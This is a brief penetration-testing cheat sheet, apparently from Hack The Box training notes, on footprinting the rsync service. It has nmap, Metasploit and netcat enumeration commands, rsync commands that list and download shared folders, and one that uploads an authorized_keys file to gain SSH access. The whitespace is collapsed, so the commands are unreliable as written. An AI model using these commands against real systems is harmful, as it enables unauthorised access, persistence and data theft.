## FootprintingIntrusionz3r0X@htb[/htb]$nmap-sV--script"rsync-list-modules"-p<PORT><IP>Intrusionz3r0X@htb[/htb]$msf>useauxiliary/scanner/rsync/modules_listIntrusionz3r0X@htb[/htb]$nc-nv127.0.0.1873# Listing a shared folderIntrusionz3r0X@htb[/htb]$rsync-av--list-onlyrsync://192.168.0.123/shared_name# Copying files from a shared folderIntrusionz3r0X@htb[/htb]$rsync-avrsync://192.168.0.123:8730/shared_name./rsyn_shared#Listen mode with credentialsIntrusionz3r0X@htb[/htb]$rsync-av--list-onlyrsync://username@192.168.0.123/shared_name# Download mode with credentialsIntrusionz3r0X@htb[/htb]$rsync-avrsync://username@192.168.0.123:8730/shared_name./rsyn_shared#Upload file content, such as an authorized_keys fileIntrusionz3r0X@htb[/htb]$rsync-avhome_user/.ssh/rsync://username@192.168.0.123/home_user/.ssh